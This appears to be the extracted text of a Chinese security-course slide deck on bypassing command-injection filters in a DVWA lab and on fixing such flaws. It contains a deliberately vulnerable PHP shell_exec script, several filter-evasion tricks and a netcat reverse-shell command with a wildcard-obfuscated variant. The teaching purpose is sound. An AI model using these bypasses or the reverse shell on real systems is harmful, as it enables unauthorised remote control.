第31讲命令执行绕过与命令执行漏洞修复08课件.pptxVIP

第31讲命令执行绕过与命令执行漏洞修复任毅

引言开发人员在开发的过程中，为了避免命令执行漏洞，可能会过滤一些命令或者比较觉的攻击payload，攻击者会通过多种方式绕过过滤规则。

小测试有哪些绕过方法？

学习目标能描述命令执行绕过的方法能在Linux+DVWA平台完成命令执行漏洞绕过能提升命令执行漏洞维护能力

绕过空格过滤（1）${IFS}绕过$IFS是shell的特殊环境变量，在Linux下的内部域分隔符，IFS存储的值，可以是空格、tab、换行符或者其他自定义符号。

绕过空格过滤（2）%09绕过%09是Tab的URL编码，可以通过%09来代替空格，绕过空格的过滤。将以下代码保存为p1.php文件，放入Linux平台phpstudy的WWW目录下：?php$ip=$_GET[ip];$cmd=shell_exec(ping-c3.$ip);echo{$cmd};?

绕过空格过滤（3）{}绕过空格过滤，可以用{}绕过，{cat,/etc/yum.conf}。

绕过空格过滤（4）、$IFS$9绕过空格可用$IFS$9绕过，如下：

绕过关键字过滤（1）变量拼接Linux支持变量赋值，可以通过变量拼接来绕过过滤规则，例：cat命令被过滤。

绕过关键字过滤（2）空变量绕过例如cat命令过滤。可以通过空变量绕过，ca${x}t

绕过关键字过滤（3）\绕过如果过滤了命令cat，可使用c\a\t绕过，如下：

绕过关键字过滤（4）系统变量绕过${SHELLOPTS}是系统自动变量，可以利用系统变量的字符拼接为命令来绕过过滤。

绕过关键字过滤（5）通配符绕过Linux支持通配符进行字符匹配，通配符的作用是用于模糊查询时通配文件名中某些不确定的字符。*代表任意字符(0到多个)?代表一个字符[]中间为字符组合，仅匹配其中任一一个字符

绕过关键字过滤（6）shell反弹绕过通过shell反弹进行攻击，但是存在过滤时，可以通过通配符来绕过进行命令执行。例如要执行以下命令：/bin/nc358888-e/bin/bash然后用通配符替换关键字，IP地址转换为10进制。192*256^3+168*256^2+91*256+135*1=3232258951/b??/?c32322589518888-e/???/b??h3232258951的16进制是0xC0A85B87?，也可以用/b??/?c0xC0A85B878888-e/???/b??h16进制的形式进行绕过。

绕过关键字过滤（7）base64编码绕过利用系统函数base64编码，将关键函数进行base64编码，绕过过滤。将id命令进行base64编码为aWQ=，然后利用base64-d进行解码，这样就绕过了过滤，并且正常执行了命令。

命令执行漏洞修复PHP配置文件禁用敏感函数通过php配置文件中的disable_functions禁用敏感函数。使用相关过滤函数处理相关参数escapeshellarg函数escapeshellarg—把字符串转码为可以在shell命令里使用的参数，过滤命令中的参数。escapeshellcmd函数escapeshellcmd—shell元字符转义，过滤命令。

测试1、有哪些命令执行绕过方法？2、有哪些过滤函数可用来防范命令执行漏洞？

小结1、命令执行绕过方法2、防范命令执行漏洞的函数：escapeshellarg、escapeshellcmd。